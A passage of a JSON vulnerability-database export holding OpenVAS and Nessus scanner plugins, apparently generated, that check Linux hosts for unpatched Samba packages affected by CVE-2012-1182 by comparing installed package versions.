!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", 
rpm:\"lib64wbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:09:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of evolution-mapi", "modified": "2018-01-17T00:00:00", "published": "2013-03-12T00:00:00", "id": "OPENVAS:881654", "href": "http://plugins.openvas.org/nasl.php?oid=881654", "type": "openvas", "title": "CentOS Update for evolution-mapi CESA-2013:0515 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for evolution-mapi CESA-2013:0515 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. 
Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n \n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n \n This update also fixes the following bugs:\n \n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n \n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. 
This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n \n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"evolution-mapi on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\");\n script_id(881654);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:29 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0515\");\n script_name(\"CentOS Update for evolution-mapi CESA-2013:0515 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of evolution-mapi\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of samba", "modified": "2017-12-28T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:850289", "href": "http://plugins.openvas.org/nasl.php?oid=850289", "type": "openvas", "title": "SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0508_1.nasl 8253 2017-12-28 06:29:51Z teissa $\n#\n# SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remote attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n --changelog samba) for more details of the version update.\";\n\ntag_affected = \"update on openSUSE 11.4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850289);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:28:59 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0508_1\");\n script_name(\"SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-devel\", rpm:\"libtevent-devel~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo\", 
rpm:\"libtevent0-debuginfo~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-x86\", rpm:\"libtevent0-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", 
rpm:\"samba-client-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T07:15:06", "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds\nwhen handling remote procedure calls (RPC) over the network. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code\nas the root user. (CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2012-04-13T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:samba", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1423-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58743", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1423-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58743);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"USN\", value:\"1423-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Brian Gorenc discovered that Samba incorrectly calculated array bounds\nwhen handling remote procedure calls (RPC) over the network. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code\nas the root user. 
